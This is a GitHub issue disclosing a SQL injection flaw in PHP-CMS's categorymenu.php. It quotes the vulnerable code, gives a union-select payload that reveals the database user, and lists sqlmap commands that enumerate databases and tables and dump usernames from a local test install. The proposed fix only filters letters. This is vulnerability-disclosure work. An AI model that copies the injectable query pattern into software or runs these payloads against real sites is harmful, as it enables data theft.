PHP-CMS icon indicating copy to clipboard operation
PHP-CMS copied to clipboard

Published 20 hours ago verified publisher icon harshitbansal373

SQL injection in categorymenu page

Open b1u3s opened this issue 2 years ago • 4 comments

Description

I found a SQL inject vulnerability in page categorymenu.php and I build a local environment to test it.

The url is http://127.0.0.1/PHP-CMS/categorymenu.php

image

The problem code is here.

 <?php
if(isset($_GET['category'])){
    $post_category_id = $_GET['category'];
}
$query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
$select_all_posts_count_query = mysqli_query($connection,$query);
$count = mysqli_num_rows($select_all_posts_count_query);
confirm_query($select_all_posts_count_query);
……
while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
    $post_id = $row['post_id'];
    $post_title = $row['post_title'];
    $post_user = $row['post_user'];
    $post_date = $row['post_date'];
    $post_image = $row['post_image'];
    $post_content = $row['post_content'];
?>

Users can control the parameter "category" by GET method without any filter,and get something that shouldn't have been queried.Such as,if "category" is changed like "-1 union select 1,2,user(),4,5,6,7,8,9,10,11",you will get the database user:

image

Proof

I use the sqlmap to do this.

1.Get database information.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 --dbs

image

2.Select a database and get table information

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms --tables

image

3.Select a table and get the columns

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users --columns image

4.Select the columns and get column contents.

sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users -C username --dump image

Solution

You can fix it by add some filter rules on the parameter "category",such as ban the letter characters.

b1u3s avatar Mar 03 '22 15:03 b1u3s